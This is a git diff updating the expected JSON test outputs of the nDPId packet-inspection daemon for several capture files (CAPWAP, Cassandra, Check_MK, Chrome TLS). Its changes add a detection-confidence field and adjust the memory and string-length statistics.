 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1422329136181,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"ts_msec":1422329136181,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAGlAAP8Rr3rAqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g\/wAAABMAAGYAABQAAQEAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"}
 00797{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":378,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"ts_msec":1422329141909,"pkt":"AQAMzMzMuDhh8wWsAXeqqgMAAAwgAAK0KHQAAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAQAAY8KAAZABCkjQABAAA8KAAAMsg="}
 00166{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":378,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":379,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1422328963915,"flow_last_seen":1422328966914,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1422329143920,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1422329005766,"flow_last_seen":1422329136181,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":492,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":217,"flow_first_seen":1422329005767,"flow_last_seen":1422329174862,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":1457,"flow_tot_l4_payload_len":54560,"flow_avg_l4_payload_len":251,"midstream":0,"ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":173,"flow_first_seen":1422329017533,"flow_last_seen":1422329175528,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":26636,"flow_avg_l4_payload_len":153,"midstream":0,"ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1422329005766,"flow_last_seen":1422329136181,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":492,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":217,"flow_first_seen":1422329005767,"flow_last_seen":1422329174862,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":1457,"flow_tot_l4_payload_len":54560,"flow_avg_l4_payload_len":251,"midstream":0,"ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":173,"flow_first_seen":1422329017533,"flow_last_seen":1422329175528,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":26636,"flow_avg_l4_payload_len":153,"midstream":0,"ts_msec":1422329175528,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":422,"source":"capwap.pcap","alias":"nDPId-test","total-events-serialized":52}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 422/397
@@ -58,9 +58,9 @@
 ~~ total active/idle flows...: 5/5
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4612182 bytes
-~~ total memory freed........: 4612182 bytes
-~~ total allocations/frees...: 99964/99964
+~~ total memory allocated....: 4695487 bytes
+~~ total memory freed........: 4695487 bytes
+~~ total allocations/frees...: 101554/101554
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
 ~~ json string max len.......: 813 chars
diff --git a/test/results/cassandra.pcap.out b/test/results/cassandra.pcap.out
index 3795d8522..9aeb7228c 100644
--- a/test/results/cassandra.pcap.out
+++ b/test/results/cassandra.pcap.out
@@ -3,14 +3,14 @@
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA86nRAAEAGUkV\/AAABfwAAAbXII1K9tHk3AAAAAKACqqr+MAAAAgT\/1wQCCAon7JNDAAAAAAEDAwc="}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStcjswQ7evbR5OKASqqr+MAAAAgT\/1wQCCAon7JNDJ+yTQwEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1450889498032,"pkt":"AAAAAAAAAAAAAAAACABFAAA06nVAAEAGUkx\/AAABfwAAAbXII1K9tHk47MEO34AQAVb+KAAAAQEICifsk0Mn7JND"}
-00603{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","ndpi": {"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498032,"flow_last_seen":1450889498032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1450889498032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA81IRAAEAGaDV\/AAABfwAAAbXJI1KmXkfoAAAAAKACqqr+MAAAAgT\/1wQCCAon7JNsAAAAAAEDAwc="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASNStckXl5aGpl5H6aASqqr+MAAAAgT\/1wQCCAon7JNsJ+yTbAEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1450889498074,"pkt":"AAAAAAAAAAAAAAAACABFAAA01IVAAEAGaDx\/AAABfwAAAbXJI1KmXkfpF5eWh4AQAVb+KAAAAQEICifsk2wn7JNs"}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","ndpi": {"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
-00655{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1450889498032,"flow_last_seen":1450889698077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25148,"flow_tot_l4_payload_len":78224,"flow_avg_l4_payload_len":543,"midstream":0,"ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
-00655{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1450889498074,"flow_last_seen":1450889698077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11446,"flow_tot_l4_payload_len":28884,"flow_avg_l4_payload_len":203,"midstream":0,"ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1450889498074,"flow_last_seen":1450889498074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1450889498074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1450889498032,"flow_last_seen":1450889698077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25148,"flow_tot_l4_payload_len":78224,"flow_avg_l4_payload_len":543,"midstream":0,"ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46536,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
+00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1450889498074,"flow_last_seen":1450889698077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11446,"flow_tot_l4_payload_len":28884,"flow_avg_l4_payload_len":203,"midstream":0,"ts_msec":1450889698077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":46537,"dst_port":9042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Cassandra","breed":"Acceptable","category":"Database"}}
 00159{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":286,"source":"cassandra.pcap","alias":"nDPId-test","total-events-serialized":14}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 286/286
@@ -20,10 +20,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4604323 bytes
-~~ total memory freed........: 4604323 bytes
-~~ total allocations/frees...: 99842/99842
+~~ total memory allocated....: 4688948 bytes
+~~ total memory freed........: 4688948 bytes
+~~ total allocations/frees...: 101432/101432
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 164 chars
-~~ json string max len.......: 660 chars
-~~ json string avg len.......: 479 chars
+~~ json string max len.......: 686 chars
+~~ json string avg len.......: 492 chars
diff --git a/test/results/check_mk_new.pcap.out b/test/results/check_mk_new.pcap.out
index b54cd53ea..552b21499 100644
--- a/test/results/check_mk_new.pcap.out
+++ b/test/results/check_mk_new.pcap.out
@@ -3,8 +3,8 @@
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA8gwhAAEAGbgrAqGQWwKhkMuZ2GZzVcug3AAAAAKACchA4TQAAAgQFtAQCCAorDGs\/AAAAAAEDAwc="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1512031663734,"pkt":"8soKyPpERjIA9qTsCABFAAA8AABAAEAG8SLAqGQywKhkFhmc5nZuqQJN1XLoOKAScSBJyAAAAgQFtAQCCAoWUVydKwxrPwEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1512031663734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1512031663734,"pkt":"RjIA9qTs8soKyPpECABFEAA0gwlAAEAGbhHAqGQWwKhkMuZ2GZzVcug4bqkCToAQAOVJwAAAAQEICisMaz8WUVyd"}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1512031663734,"flow_last_seen":1512031663736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1512031663736,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","ndpi": {"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}}
-00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1512031663734,"flow_last_seen":1512031663775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4096,"flow_tot_l4_payload_len":13758,"flow_avg_l4_payload_len":140,"midstream":0,"ts_msec":1512031663775,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1512031663734,"flow_last_seen":1512031663736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1512031663736,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}}
+00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1512031663734,"flow_last_seen":1512031663775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4096,"flow_tot_l4_payload_len":13758,"flow_avg_l4_payload_len":140,"midstream":0,"ts_msec":1512031663775,"l3_proto":"ip4","src_ip":"192.168.100.22","dst_ip":"192.168.100.50","src_port":58998,"dst_port":6556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CHECKMK","breed":"Acceptable","category":"DataTransfer"}}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":98,"source":"check_mk_new.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 98/98
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597671 bytes
-~~ total memory freed........: 4597671 bytes
-~~ total allocations/frees...: 99651/99651
+~~ total memory allocated....: 4682624 bytes
+~~ total memory freed........: 4682624 bytes
+~~ total allocations/frees...: 101241/101241
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
-~~ json string max len.......: 672 chars
-~~ json string avg len.......: 478 chars
+~~ json string max len.......: 698 chars
+~~ json string avg len.......: 489 chars
diff --git a/test/results/chrome.pcap.out b/test/results/chrome.pcap.out
index eca1fdeda..c49a82c61 100644
--- a/test/results/chrome.pcap.out
+++ b/test/results/chrome.pcap.out
@@ -3,14 +3,14 @@
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620902507870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1620902507870,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuJAbsdWbUDAAAAALAC\/\/8TEgAAAgQFtAEDAwUBAQgKM3SSOAAAAAAEAgAA"}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620902507899,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4lEvFS6HVm1BKAS\/og8HwAAAgQFrAQCCAo6mxVSM3SSOAEDAwc="}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620902507899,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuJAbsdWbUERLxUu4AQECxZJAAAAQEICjN0klQ6mxVS"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902507870,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1620902507899,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902507870,"flow_last_seen":1620902507935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1620902507935,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
